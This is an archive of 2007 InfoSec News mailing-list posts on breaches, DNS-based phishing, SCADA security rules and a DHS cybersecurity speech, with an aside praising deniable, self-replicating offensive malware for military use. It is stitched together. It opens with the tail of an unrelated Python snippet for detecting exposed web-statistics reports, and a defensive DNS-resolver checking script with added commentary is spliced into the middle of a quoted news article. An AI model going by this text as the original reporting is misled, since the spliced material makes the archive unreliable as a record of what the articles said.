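        "top_visitor": None if top is None else (top["Hostname"], int(top["Files"]), int(top["KBytes"])),
        "visitor_hosts": [r["Hostname"] for r in sites],
        "top_urls": [r["URL"] for r in urls],
    }
```

Pointing is_webalizer_report at the bodies of /usage/ and /stats/ on your own hosts (fetched with urllib) is the check; what footprint_summary returns from a hit is the argument for fixing it. The remediation is to generate the reports outside the document root or put access control on the directory, and to treat a hit as a reminder that the raw access logs behind the report deserve the same handling.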
[1] http://www.ctcentre.mod.uk/index.php

From alerts at infosecnews.org Wed Dec 12 00:12:53 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Munger: DOE incinerator down as waste concerns go up
Message-ID:

http://www.knoxnews.com/news/2007/dec/12/doe-incinerator-down-as-waste-concerns-go-up/

By Frank Munger
knoxnews.com
December 12, 2007

[...]

---

Following last week's revelations about a computer hacking that potentially exposed the personal data of thousands of lab visitors, Oak Ridge National Laboratory is saying little about the event and the ongoing investigation.

Lab spokesman Billy Stair said he couldn't comment about a report in The New York Times that the hacking may have had a link to China. The Times referred to a memo from the Department of Homeland Security that suggested "phishing" e-mails were sent to ORNL from Web locations with links to China, although that didn't necessarily mean the Chinese government or any of its citizens were behind the hacking efforts.

Stair also declined comment on what agencies are involved in the investigation and wouldn't say if ORNL is collaborating with Los Alamos National Laboratory, which experienced a similar event in the same time frame.

The "sophisticated" attack tapped into an unclassified database, but it would seem unlikely that ORNL was targeted for personal info on visitors. Surely, there would be easier places to infiltrate for identity theft than a high-security national lab. The lab has been reluctant to discuss possible motives.

"That's a dangerous area to get into because ultimately we can only speculate, and speculation can get you into trouble," Stair said. "The prudent thing to do is to focus on keeping people out and not focus on why they're trying to get in."

Senior writer Frank Munger may be reached at 342-6329. His e-mail is munger (at) knews.com. His blog, Atomic City Underground, is available online at http://blogs.knoxnews.com/knx/munger/

Copyright 2007, Knoxville News Sentinel Co.

From alerts at infosecnews.org Wed Dec 12 00:13:04 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Report: iPhone to be target of hackers in 2008
Message-ID:

http://www.macworld.com/news/2007/12/11/hackiphone/index.php

By Jim Dalrymple
Macworld.com
December 11, 2007

Since it was released in June, the iPhone has been the target of many users who wanted to customize the way it looks and of hackers who wanted to use the device on other wireless networks. However, Arbor Networks predicts the seriousness of attacks on the iPhone will increase in 2008.

According to Arbor's Security and Engineering Response Team (ASERT), the attacks will likely be in the form of "drive-by" attacks: malware embedded into seemingly harmless information, images or other media that actually performs dangerous actions when rendered in the iPhone's Web browser.

"With the scrutiny the iPhone has received since its launch earlier this year over network lock-in, ASERT believes that hackers will be enticed by the possibility of attacking Apple users and the opportunity to be the first to hack a new platform," the report said.

Apple has been involved in an ongoing battle with hackers for months. While the hacks have not been malicious, the process of unlocking the phone and allowing it to work with networks other than AT&T has caused Apple to react. After hackers successfully unlocked the iPhone, Apple warned users that future updates might render those devices inoperable. Later that same week, Apple released an update that did, in fact, disable unlocked iPhones.
From alerts at infosecnews.org Wed Dec 12 00:13:20 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] TJX Lawsuit Transferred
Message-ID:

http://online.wsj.com/article/SB119743288731823035.html

By Joseph Pereira
The Wall Street Journal
December 12, 2007

BOSTON -- A lawsuit by a group of New England and Alabama banks against TJX Cos. over a data breach that resulted in the theft of millions of credit-card numbers was transferred to a Massachusetts state court by a federal judge.

In his order yesterday, U.S. District Judge William G. Young denied the plaintiffs' request to sue as a class and ruled that without class-action status the case would no longer fall under federal jurisdiction.

The decision underscores a problem that litigants in electronic data-breach cases -- a relatively new phenomenon in the U.S. legal system -- will have to resolve to be granted financial relief for alleged damages.

"It is very difficult to prove whether any particular fraud loss is connected to the particular data breach as opposed to some other source," said Kevin McGinty, a class-action defense expert in Boston who isn't involved in the TJX case. How a specific loss occurred would have to be investigated on an individual basis, he said, and "that's why the judge decertified the case."

[...]

From alerts at infosecnews.org Wed Dec 12 00:13:33 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] 'We're all at risk' of attack, cyber chief says
Message-ID:

http://www.govexec.com/story_page.cfm?articleid=38798

By Liza Porteus Viana
Technology Daily
December 11, 2007

NEW YORK -- Private industry and governments need to make cyber security a priority, no matter what the cost, in order to defeat hackers and terrorists and to keep operations running during a crisis, a federal official said here Tuesday.

Private industry owns and operates more than 85 percent of the country's critical infrastructures. "That means the federal government cannot address these cyber threats alone," said Greg Garcia, the Homeland Security assistant secretary who heads the national cyber-security division.

Garcia addressed the New York City Metro InfraGard Alliance blocks from the World Trade Center site attacked by terrorists Sept. 11, 2001. InfraGard is a partnership between the FBI, local law enforcement and the private sector aimed at protecting critical infrastructures, including technology systems.

"You all know our adversaries will stop at nothing to destroy the infrastructures we all work so hard to protect. ... We're all at risk, we're all responsible, and there's much more we have to do to protect our critical systems," Garcia said. "New York is the world's financial nucleus. ... As Wall Street goes, so does the rest of the economy."

About $5.5 trillion to $6 trillion runs through the U.S. financial system each day, including paycheck delivery and withdrawals from automatic teller machines. Still, Garcia said, large household-name companies are leaving their networks exposed to infiltration and data theft.

The federal government relies heavily on organizations like InfraGard and information-sharing and analysis centers for specific economic sectors to force industry to take cyber precautions. He said that partnership is particularly important given that hackers are becoming more sophisticated, and that malicious code and software are now sold cheaply over the Internet.

Garcia said there is a $100 billion market for cyber crime -- more than the illegal drug market. In fiscal 2007, the U.S. Computer Emergency Readiness Team handled more than 37,000 incidents, compared with about 24,000 in fiscal 2006.

"Unfortunately, none of this is going to dissipate if we don't have the same level of coordination and organization our adversaries have against us," Garcia said.
On the government side, the Homeland Security Department's Einstein network monitors systems for abnormalities or intrusions and circulates threat information within hours. Einstein is used by 13 agencies, but Garcia wants all to subscribe. "There's strength in numbers," the assistant secretary said. "Just like beat cops, out-of-the-ordinary events or activities can tip off cyber responders to potential trouble." Industry also needs to consider physical threats that could affect networks, such as a pandemic flu outbreak, Garcia said. Companies must ensure that their businesses can operate via telecommuting during a crisis and that their networks don't become bottlenecked, he said. They should boost network security ahead of time to ensure continuity of operations. If the businesses don't do this, Garcia said, "our economy -- in fact, our very way of life -- is going to be at stake." Garcia toured the city's wireless network operations and emergency management centers, and spoke with city leaders about how they are managing and securing communications systems designed to operate across jurisdictions. In March, the department will conduct an exercise to practice coordinated responses to simulated strings of cyber attacks affecting all levels of government and industry. From alerts at infosecnews.org Wed Dec 12 00:13:46 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Employees care little for corporate data Message-ID: http://www.techworld.com/security/news/index.cfm?newsID=10899 By Tom Jowitt Techworld 11 December 2007 Employees have a careless and even negligent attitude to corporate data and infrastructure, finds a survey from online backup service provider Databarracks. The survey of more than 100 UK office workers found that 84 percent of workers felt they could not do their job for more than half a day if they lost access to corporate data. 
Meanwhile, 43 percent of respondents said they could not cope for any period without access.

Yet despite this obvious high dependency on access to corporate data, many staff have an apathetic attitude to their corporate infrastructure. More than half (57 percent) said they had at some point lost an office laptop, Blackberry or USB stick. It seems that the favourite places to lose these devices are in the pub, bar or restaurant.

Nearly two thirds (63 percent) of respondents have accidentally deleted data on corporate networks, whilst 69 percent admitted to saving more than 10 important work files on their PCs alone (i.e. no backups), which could cause disruption if, for example, the equipment were stolen or damaged.

In an age where there is little loyalty in the business environment, either from the company to staff (or vice versa), it is perhaps no surprise then that nearly three quarters (77 percent) of respondents said they would save their mobile phone first, over their work PC, if both were on fire.

Additionally, 77 percent said they stored personal content on their office network or PC, a trend that Databarracks feels increases the risk of malware and puts strain on corporate resources.

And it seems that the green message is just not getting through to a segment of staff either, with 24 percent stating they never switched off their computer at the end of the day. Only 23 percent said they sometimes closed down.

More than half (55 percent) also feel that their company is ill prepared for environmental disasters, with 55 percent feeling their company should plan better for floods etc. This survey is not the first to point out how ill-prepared some IT departments are for natural disasters.

"This research paints a frightening picture for UK organisations," said Peter Groucutt, MD of Databarracks. "Almost every business, irrelevant of sector, is reliant on the information stored on its IT network to manage day-to-day operations."

"This dependence makes it critical for organisations and their employees to protect their network information, yet our survey shows carelessness and even negligence among many respondents, who have a haphazard view of how corporate data should be handled," he added.

It is perhaps hardly surprising then that the online backup provider advises that "more organisations have to start seriously considering secure online backup to protect themselves from unforeseen events."

From alerts at infosecnews.org Wed Dec 12 00:14:01 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] DNS attack could signal Phishing 2.0
Message-ID:

http://www.infoworld.com/article/07/12/11/DNS-attack-could-signal-Phishing-2.0_1.html

By Robert McMillan
IDG News Service
December 11, 2007

Researchers at Google and the Georgia Institute of Technology are studying a virtually undetectable form of attack that quietly controls where victims go on the Internet.

The study, set to be published in February, takes a close look at "open recursive" DNS servers, which are used to tell computers how to find each other on the Internet by translating domain names such as google.com into numerical IP addresses. Criminals are using these servers in combination with new attack techniques to develop a new generation of phishing attacks.

The researchers estimate that there are 17 million open-recursive DNS servers on the Internet, the vast majority of which give accurate information. Unlike other DNS servers, open-recursive systems will answer all DNS lookup requests from any computer on the Internet, a feature that makes them particularly useful for hackers.

Georgia Tech's and Google's researchers estimate that as many as 0.4 percent, or 68,000, open-recursive DNS servers are behaving maliciously, returning false answers to DNS queries. They also estimate that another 2 percent of them provide questionable results.
Collectively, these servers are beginning to form a "second secret authority" for DNS that is undermining the trustworthiness of the Internet, the researchers warned.

"This is a crime with few witnesses," said David Dagon, a researcher at Georgia Tech who co-authored the paper. "These hosts are like carnival barkers. No matter what you ask them, they'll happily direct you to the red light store, or to a Web server that does nothing more than spray your eyeballs with ads."

Attacks on the DNS system are not new, and online criminals have been changing DNS settings in victims' computers for at least four years now, Dagon said. But only recently have the bad guys lined up the technology and expertise to reliably launch this particular type of attack in a more widespread way. While the first such attacks used computer viruses to make these changes, lately attackers have been relying on Web-based malware.

Here's how an attack would work. A victim would visit a Web site or open a malicious attachment that would exploit a bug in his computer's software. Attackers would then change just one file in the Windows registry settings, telling the PC to go to the criminal's server for all DNS information. If the initial exploit code was not stopped by anti-virus software, the attack would give attackers virtually undetectable control over the computer.

Once they'd changed the Windows settings, the criminals could take victims to the correct Web sites most of the time, but then suddenly redirect them to phishing sites whenever they wanted -- during an online banking session, for example. Because the attack is happening at the DNS level, anti-phishing software would not flag the phoney sites.

Or an attacker could simply take complete control over the victim's Internet experience, Dagon said. "If you look up the address of a Christian Science Reading Room site, they'll point you to skin exotica," he said. "If you ask where Google.com is located, they'll point you to a machine in China selling luggage."

"It's really the ultimate back door," said Chris Rouland, chief technology officer with IBM's Internet Security Systems division. "All the stuff we've deployed in the enterprise, it's not going to look for this."

Rouland expects to see more of these DNS attacks launched from Web 2.0 sites in the coming months, because they make it very easy for people to "mash up" Web pages from many different sources -- some of which may be untrustworthy. "This is truly the next generation of phishing," he said.

Preliminary findings by Dagon's team show that the Web is an important vector for these attacks. Using Google's network of Web crawlers, researchers uncovered more than 2,100 Web pages that used exploit code to change the Windows registry of visitors.

The team's paper, entitled Corrupted DNS Resolution Paths, is set to be published at the Network and Distributed System Security Symposium (NDSS) in San Diego. It is co-authored by Chris Lee and Wenke Lee, of Georgia Tech, and Niels Provos, a senior engineer with Google.

Last year Dagon and Wenke Lee founded a startup called Damballa, which is developing ways to protect against these types of attacks. Damballa, which bills itself as an anti-botnet appliance vendor, can identify compromised machines by tracking whether or not they are communicating with DNS servers that are known to be malicious.
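As an added illustration of the defensive side of the attack described above (this is not code from the study, from Google or from Damballa): a Python sketch that flags hosts whose DNS traffic goes to resolvers outside an approved set, the way Damballa is said to spot machines talking to the wrong DNS servers, and that compares a resolver's answers for a few reference names against trusted answers to separate accurate, questionable and outright lying resolvers. All resolver addresses, hostnames, flow records and answer sets are constructed sample data, and the classification rules are mine, not the researchers' method.

```python
"""Defender-side checks for corrupted DNS resolution paths.

Check 1: a host whose DNS settings were repointed sends port-53 traffic to a
resolver outside the organisation's approved set.
Check 2: an open resolver that lies is caught by comparing its answers for
reference names with answers from trusted resolvers.
All data below is constructed; the labelling rules are illustrative only.
"""
from collections import defaultdict

# Hypothetical approved recursive resolvers (constructed).
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# Constructed flow records: (client_host, dst_ip, dst_port, protocol).
SAMPLE_FLOWS = [
    ("ws-101", "10.0.0.53", 53, "udp"),
    ("ws-102", "10.0.1.53", 53, "udp"),
    ("ws-103", "198.51.100.7", 53, "udp"),   # repointed to an outside resolver
    ("ws-103", "10.0.0.53", 53, "udp"),
    ("ws-104", "203.0.113.9", 53, "tcp"),
    ("ws-104", "203.0.113.9", 443, "tcp"),   # not DNS, ignored
]


def hosts_using_unapproved_resolvers(flows, approved=APPROVED_RESOLVERS):
    """Return {host: [resolver_ip, ...]} for hosts whose port-53 traffic
    goes anywhere other than an approved resolver."""
    findings = defaultdict(set)
    for host, dst, port, _proto in flows:
        if port == 53 and dst not in approved:
            findings[host].add(dst)
    return {host: sorted(ips) for host, ips in findings.items()}


# Constructed trusted answers, as returned by the organisation's own resolvers.
TRUSTED_ANSWERS = {
    "bank.example": {"192.0.2.10"},
    "news.example": {"192.0.2.20", "192.0.2.21"},
    "shop.example": {"192.0.2.30"},
    "mail.example": {"192.0.2.40"},
}
# Names where even one wrong answer is treated as hostile (constructed).
SENSITIVE_NAMES = {"bank.example"}

# Constructed answer sets observed from four candidate open resolvers.
CANDIDATE_RESOLVERS = {
    "honest": {                       # one of the two valid news records
        "bank.example": {"192.0.2.10"}, "news.example": {"192.0.2.21"},
        "shop.example": {"192.0.2.30"}, "mail.example": {"192.0.2.40"},
    },
    "stale": {                        # one outdated record, rest correct
        "bank.example": {"192.0.2.10"}, "news.example": {"192.0.2.22"},
        "shop.example": {"192.0.2.30"}, "mail.example": {"192.0.2.40"},
    },
    "selective": {                    # correct except for the bank
        "bank.example": {"203.0.113.66"},
        "news.example": {"192.0.2.20", "192.0.2.21"},
        "shop.example": {"192.0.2.30"}, "mail.example": {"192.0.2.40"},
    },
    # The "carnival barker": every name resolves to the same ad server.
    "barker": {name: {"203.0.113.99"} for name in TRUSTED_ANSWERS},
}


def classify_resolver(answers, trusted=TRUSTED_ANSWERS, sensitive=SENSITIVE_NAMES):
    """Compare one resolver's answers with the trusted set.

    Returns (label, mismatched_names). 'accurate': every answer overlaps the
    trusted records. 'malicious': a mismatch hits a sensitive name, or one
    address is handed out for several unrelated names (mass redirection).
    'questionable': any other disagreement; stale caches and CDN changes land
    here too, so this label means "look closer", not "alert".
    """
    mismatched = sorted(
        name for name, good in trusted.items()
        if not (answers.get(name, set()) & good)
    )
    if not mismatched:
        return "accurate", mismatched
    names_per_address = defaultdict(set)
    for name in mismatched:
        for addr in answers.get(name, set()):
            names_per_address[addr].add(name)
    collapses = any(len(names) > 1 for names in names_per_address.values())
    if collapses or any(name in sensitive for name in mismatched):
        return "malicious", mismatched
    return "questionable", mismatched


def classify_all(candidates=CANDIDATE_RESOLVERS):
    """Label every candidate resolver; returns {resolver: label}."""
    return {name: classify_resolver(ans)[0] for name, ans in candidates.items()}


if __name__ == "__main__":
    for host, ips in hosts_using_unapproved_resolvers(SAMPLE_FLOWS).items():
        print(f"{host}: DNS traffic to unapproved resolver(s) {', '.join(ips)}")
    for resolver, label in classify_all().items():
        print(f"resolver {resolver!r}: {label}")
```

In a real deployment the flow records would come from gateway NetFlow or DNS logs and the trusted answers from the organisation's own resolvers queried at the same time, since legitimate round-robin or CDN changes would otherwise show up as mismatches.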
From alerts at infosecnews.org Wed Dec 12 00:14:17 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Energy companies face costly upgrades to secure electric grid
Message-ID:

http://www.networkworld.com/news/2007/121007-energy-companies.html

By Ellen Messmer
Network World
12/11/07

In an effort to improve security in the nation's electric power grid, the Washington-based Federal Energy Regulatory Commission is poised to issue new rules to compel energy companies to use practices such as patch management and strong authentication to secure their industrial control systems against attackers, sabotage and unauthorized use.

If FERC at its Dec. 20 meeting approves the so-called Critical Infrastructure Protection (CIP) standards for physical and cybersecurity of the electric power grid, it will flip the switch on a regulatory regime where electric-power companies have to ensure the most critical parts of their system control and data-acquisition (SCADA) systems meet security requirements more associated with corporate computer best practices.

But because many SCADA systems in place today to control the bulk-power grid may not be readily adapted for cybersecurity protection, IT managers at energy companies say they face the prospect of a wholesale replacement of their SCADA systems to meet regulatory goals.

"There are SCADA systems out there for forty or fifty years and they're running fine," says Patrick Miller, chair of the electric-utility user group called Energy Security Northwest, whose membership hails from 20 utilities. The energy companies across the country, he says, expect the upcoming FERC decision to influence whether they will need to wholly replace SCADA systems to meet new security regulations. Some energy companies say it seems unavoidable.

The almost 20-year-old control systems made by Televant Farradyne used by the Eugene Water & Electric Board in Oregon to throw switches and move power are going to be phased out, though replacements haven't been selected yet, says senior security specialist Mark Ellister. "This is ancient technology, you can't patch this," says Ellister.

Power struggles

To add to the anxiety, even as FERC prepares to establish new security rules for the electric power industry as it must under a Congressional law passed in 2005, it's unclear whether the commission will adopt outright the eight CIP standards that were proposed last year by the organization called the North American Electric Reliability Corp. (NERC). FERC chose NERC to do the job of submitting standards and later start auditing for them and looking for possible violations, which could mean steep fines, over the next few years.

Joseph McClelland, director of the newly formed Office of Electric Reliability at FERC, recently told Congress it may ask NERC to tighten the proposed standards, which as now written allow for some laxness in following them, especially if they're not technically feasible for legacy equipment which can't be upgraded to meet cybersecurity requirements. "If this equipment is left vulnerable, it could be the focal point of efforts to disrupt the grid," McClelland told Congress in October.

In addition, the National Institute of Standards and Technology (NIST) is arguing that it should be the one setting the standards. NIST has clear authority to set security standards for both the business and SCADA systems in federally operated electric utilities such as the Tennessee Valley Authority and Bonneville Power Authority, notes Stuart Katzke, senior research scientist at NIST. "The federal ones have to meet the NIST standards guidelines," says Katzke. "They also have to meet FERC's regulations, whatever they will be."
NIST wants FERC to approve NIST security guidelines for industrial controls, which are out for comment until mid-December. NIST says its proposed standards are tougher and better than the ones proposed by NERC.

Where is SCADA security?

Caught in the middle of this power struggle, the industry's IT managers say that many SCADA systems in use today, whether based on Windows, Unix or older proprietary operating systems, simply aren't designed to accommodate processes like patch management in the round-the-clock operations of managing the nation's power grid. Plus giant SCADA systems traditionally aren't just swapped out. "With SCADA, you do it with very small pieces over a very long period of time," Miller says. "It runs the power grid."

Miller says the older workhorse systems and even new equipment seldom meet the high expectations of the eight CIP standards under review by FERC, which may take a hard line in not allowing exceptions. Miller adds he's seen scant evidence that SCADA manufacturers, other than Schweitzer Engineering Laboratories, are seeking to adapt to the new security requirements.

The American Public Power Association (APPA), the Washington-based trade association representing 2,000 publicly operated utilities, supports the security standards effort but hopes FERC will allow a technical feasibility exception for older equipment in substations and generating plants which is incompatible with certain cyber-security measures, including software updates and patches.

"Utilities should be able to take advantage of the useful life of existing equipment from a reliability standpoint," APPA said in its official comments to FERC. APPA also noted there are risks with using vendor patches as well as using software with a known flaw.

Even NERC, whose executive vice president, David Wheatley, testified before Congress in October, expressed worry that promulgating standards for the bulk power system that draw too closely on the standards appropriate for secured business systems "could result in a less reliable bulk-power system, either because of decreased operations or decreased security." Wheatley's testimony cited as examples how use of password-protected screen savers could block visibility of real-time operations that have to be constantly observed, or mistyped passwords could lock out access to operations controls. NERC declined to discuss this but said the Congressional testimony reflects its current views.

Allen Mosher, APPA's senior director of policy analysis, said the security standards process is likely to be one that gets updated every three years or so, and the NIST proposals might get adopted over time. Whatever the outcome of the FERC security standard rule-making, there will be a lot at stake as NERC starts to do audits over the next two years or so and reports any security violations and noncompliance to FERC. "Fines could be up to $1 million per day per violation," Mosher concluded.

All contents copyright 1995-2007 Network World, Inc.

From alerts at infosecnews.org Wed Dec 12 00:14:30 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Downing St responds to silicon.com's Full Disclosure campaign
Message-ID:

http://software.silicon.com/security/0,39024655,39169411,00.htm

By Gemma Simpson
Silicon.com
December 2007

Organisations are to get guidance from data protection watchdog the Information Commissioner on notifying their customers of a security breach.

The plans have been revealed by the government in response to silicon.com's Full Disclosure campaign [1], which calls for a review of the data breach notification laws in the UK.
As part of the campaign silicon.com launched an online petition on the Downing Street website calling for the Prime Minister to improve the reporting of information security breaches in the public and private sectors. The e-petition received more than 300 signatures.

The government said the move towards data breach notification laws in other jurisdictions - such as seen in the US - is an "interesting development", but said it is not convinced this would lead to better protection of data.

But the response did not completely dismiss the notion of UK data breach legislation, and said: "The government does not discount the idea of a data breach law. However, it is not convinced that it would lead to an improvement in performance by business in regard to protecting personal information."

Instead of a data breach law, the written response hinted towards a voluntary "checklist" that will offer companies guidance on what to do following a data breach.

The response said: "The Information Commissioner's Office (ICO) acknowledges that there are occasions when notifying consumers of a breach of security might not be appropriate. The ICO plans to consider drafting some checklist guidance to organisations - similar to guidance that exists in Canada and New Zealand."

The UK's data protection watchdog already published new guidelines for individuals to better understand how and why organisations use their data under the current Data Protection Act in August 2007.

Downing Street's response to the silicon.com petition also said the government takes "the protection of personal data extremely seriously" and that the Data Protection Act sets out the framework for data protection and any enforcement action which may be taken by the Information Commissioner and the courts.

In November, Prime Minister Gordon Brown gave the ICO the power to conduct spot checks on government departments, in light of the HM Revenue & Customs breach which saw 25 million child benefit claimants' details 'lost in the post' - making it the largest UK data breach in history.

[1] http://www.silicon.com/publicsector/0,3800010403,39167826,00.htm

From alerts at infosecnews.org Thu Dec 13 02:04:13 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Most in military believe a war with China will come
Message-ID:

http://www.taipeitimes.com/News/taiwan/archives/2007/12/13/2003392340

POLL: Lieutenant General Chen Kuo-hsiang said that the questionnaire was given to 3,010 soldiers who took part in an exercise after an `intensive mental training course'

By Jimmy Chuang
STAFF REPORTER
Dec 13, 2007

More than 50 percent of military personnel believe there is going to be war between Taiwan and China -- numbers the Ministry of National Defense's General Political Warfare Bureau said yesterday were a good sign.

"It shows that most of our personnel have not forgotten they face an enemy that needs to be dealt with. They would be ready for combat on the shortest possible notice," said Lieutenant General Chen Kuo-hsiang, director-general of the bureau.

Chen made his remarks during a meeting at the legislature's National Defense Committee yesterday morning.

Unveiling the results of a survey conducted earlier this year, the bureau said that 50.3 percent of military personnel who participated in the annual Han Kuang military exercise believed there will be a war between Taiwan and China sometime in the near future.

Chen said the questionnaire was given to 3,010 soldiers who participated in the exercise following an "intensive mental training course." He refused to give any details about the course.

"I can only say that based on the results, we have achieved what we set out to do," Chen said.
"Reminding our soldiers of the existing threat and making sure everything is on track is in line with our goals. Obviously, the exercise and training were a success," he said.

In addition to believing that war was imminent, 85.6 percent of respondents said they were always conscious of the possibility of information leaks or Chinese espionage occurring while they were on duty.

Chen said the course was designed to help soldiers realize that Beijing is relentless in its military threat against Taiwan.

"In addition to the constant reminder, the results also showed that 85.7 percent of our military personnel would do whatever it takes to perform their jobs under any circumstances," Chen said. "This is a good sign," he said.

From alerts at infosecnews.org Thu Dec 13 02:04:27 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] How to Wage Cyber War
Message-ID:

http://blog.wired.com/defense/2007/12/how-to-wage-cyb.html

By Noah Shachtman
Wired.com
December 12, 2007

Pentagon types are spending God-knows-how-much to wage battle online. Brave New War [1] author John Robb [2] offers 'em some tips on how to put their dough to the best use [3].

Over the past few years, the Defense Department has morphed the nuclear weaponeers of U.S. Strategic Command [4] into network warriors, and turned the 8th Air Force into a new "Cyberspace Command." Not to mention plowing countless billions into the National Security Agency [5] and all kinds of digital combat cadres [6], scattered throughout the armed services. And from the interviews I've done, at least, the roles and expectations for each of these agencies is, um, evolving, at best.

Robb's advice, to his former Air Force colleagues now putting Cyberspace Command together:

* Real-world experience and rapid (open source) innovation. Most, if not all, of this experience and innovation in cyberwarfare is gained through criminal activity. Innovation is a product of rapid cycles of competition with software vendors and computer security companies.

* Massive self-replication. Think in term of small teams (the smarter, the better) designing software that seizes control of tens of millions of computer systems through various forms of infection.

* Deniability. Nearly all of the successful operations conducted in offensive cyberwarfare will require deniability. Post-attack forensics must not point back to a government since these wars/battles will be fought in peacetime.

Given these requirements, Robb believes, "this new Command will likely fail (and badly)." It'll create public relations disasters -- and retreat into a largely defensive crouch. And once it does, it'll be outmaneuvered by countries willing to get in bed with online mafias.

We'll see.

[1] http://www.amazon.com/exec/obidos/ASIN/0471780790/c4iorg
[2] http://globalguerrillas.typepad.com/
[3] http://globalguerrillas.typepad.com/globalguerrillas/2007/12/the-us-and-cybe.html
[4] http://www.defenselink.mil/news/newsarticle.aspx?id=47605
[5] http://blog.wired.com/defense/2007/09/nsa-targets-hac.html
[6] http://blog.wired.com/defense/2007/10/also-nsa-target.html

From alerts at infosecnews.org Thu Dec 13 02:04:54 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Remarks of Assistant Secretary of Cybersecurity and Communications Greg Garcia at the New York Metro Infragard Alliance Security Summit
Message-ID:

http://www.dhs.gov/xnews/releases/pr_1197409593155.shtm

Release Date: December 11, 2007
New York, NY
(Remarks as prepared)

New York is such a fitting place to hold a security summit. With its storied history and thousands of financial institutions, it is the world's financial nucleus. All of you, as leaders in your respective companies and organizations, understand the full weight of your responsibilities to New York City itself, the nation, and quite honestly, the world.
Because as Wall Street goes, so does the rest of the world. That is quite a responsibility to shoulder. Yet you have continuously demonstrated your understanding and commitment to upholding this reputation.

Time and again, whether facing a natural disaster or terrorist attack, you have found ways to ensure that roughly five and a half trillion dollars flows unabated through our financial systems each and every day. That's five and a half trillion dollars a day in activities that are critical to our citizens' basic needs and our Nation's economy. It's the delivery of paychecks, utility bill payments, ATM withdrawals, and the over $733 million of Internet sales that occurred this past cyber Monday -- the first Monday after Thanksgiving, which is considered the most active online shopping day of the year.

As New Yorkers know, our adversaries will stop at nothing to destroy the infrastructures we have all worked so hard to build and protect. Whether they are cyber criminals, hacktivists, or nation states, our adversaries are pursuing ever more sophisticated and determined cyber attacks on U.S. government and private sector networks.

I'm watching as companies -- household names with huge market capitalization and seemingly tremendous resources -- expose their networks and data to infiltration and information theft. I'm seeing the same with government agencies on a regular basis. So we're all at risk, and we're all responsible. We have made some progress but there is much more we all have to do to protect our critical systems.

So let me tell you what we're doing at DHS to make the United States the most difficult and dangerous place in the world to conduct cyber crime. I think you will see that you each have a very important role to play in helping to make this happen.

Let me start with an overview of the threats as we see them at DHS. As you all know, the threats are real. Hackers are becoming more sophisticated and focused in their efforts. Criminal computer code is now written at the PhD level, and sold cheaply on the Internet. Hackers are making massive efforts to compromise computer systems on a global scale.

What was once a nuisance committed by various individuals years ago has now progressed into organized efforts by highly skilled professionals. Today's professional hackers develop and sell malware toolkits to other criminals on the black market. In turn, the buyers of these toolkits can conduct online scams and spread malware more proficiently than ever before.

Why do they do this? Because cyber crime is big business. The number of hackers attacking banks worldwide jumped 81 percent over the past year. Botnets, spear phishing, key loggers, and other attacks make up the more-than-$100 billion global market for cyber-crime -- surpassing drug trafficking from a monetary perspective. Worst of all, the money obtained through cyber crime can be used to finance terrorism.

The numbers don't lie. From October 1, 2006, through September 30, 2007, our US-CERT -- which I'll describe in more detail in a moment -- handled more than 37,000 incidents, compared with almost 24,000 the year before. This increase can be attributed to not only more attacks on our public and private networks, but also better situational awareness levels and reporting rates.

I'll tell you now: many of these malicious attacks are designed to steal information and disrupt, deny access to, degrade or destroy critical federal or private sector information systems. Our adversaries are also seeking our intellectual capital and proprietary information, which we have spent years -- and billions of dollars -- developing.

Unfortunately, none of this will dissipate if we do not have the same level of organization and coordination that our adversaries are using against us. This dynamic underscores the absolute necessity for IT security and the importance of a nationwide call to secure cyberspace. It's something we can't afford not to do.
Our mission is clear. Securing the systems that maintain and operate critical infrastructures is vital to national security, public safety, and economic prosperity.

How do we do this? Collaboration and information sharing. It's a common theme in many of the speeches you hear because public/private partnerships, like InfraGard and the Financial Services and Multi-State Information Sharing and Analysis Centers (ISACs), are essential to protecting our critical infrastructures.

Let's be realistic. Private industry owns and operates more than 85 percent of the United States' critical infrastructures. That means the Federal Government cannot address cyber threats alone. Obviously, if a cyber attack occurs, the larger percentage of potential immediate victims will also be in the private sector. This includes the financial services industry. So not only does it make sense to collaborate with each other, it is an absolute necessity.

At DHS, one of our best information sharing mechanisms is the United States Computer Emergency Readiness Team, or US-CERT. The nation's cyber watch and warning center, US-CERT coordinates the defense against and response to cyber attacks in coordination with the private sector. It also analyzes and reduces cyber threats and vulnerabilities, disseminates cyber threat warning information, and manages incident response activities with a wide range of stakeholders.

US-CERT's activities allow us to see potential trends and coordinate appropriate deterrence and response activities across sectors. A prime example of this occurred just last month when the US-CERT served as the key data gathering and distribution center for a potential cyber threat to both government and private sector systems maintaining critical infrastructures. By taking advantage of its information-sharing relationships, US-CERT distributed a notice defining the malicious activity and addressing how partners could detect and prevent it from affecting their networks. This directly strengthened the security and resilience of our nation's critical infrastructures.

The key lesson here is that by sharing our knowledge, we can better protect our nation. But we also know that this information sharing relationship is not as mature yet as it can be. The feedback we received from our private sector partners after this information notice was, overall, very positive and appreciative. But it included a reminder that such notices would be more useful if DHS could provide more threat-based context -- that is, what is the nature of these attacks? Where do they come from? What is their intent?

Well, we continue to be limited in what we can share with partners who don't have appropriate security clearances (indeed that's an issue within the U.S. government agencies as well). And we have to find better, quicker ways to get you relevant information that you can act on. And, from our perspective, when we provide you information you already have, we realize both sides need to better calibrate our exchange of information so we make most effective use of our limited time and resources.

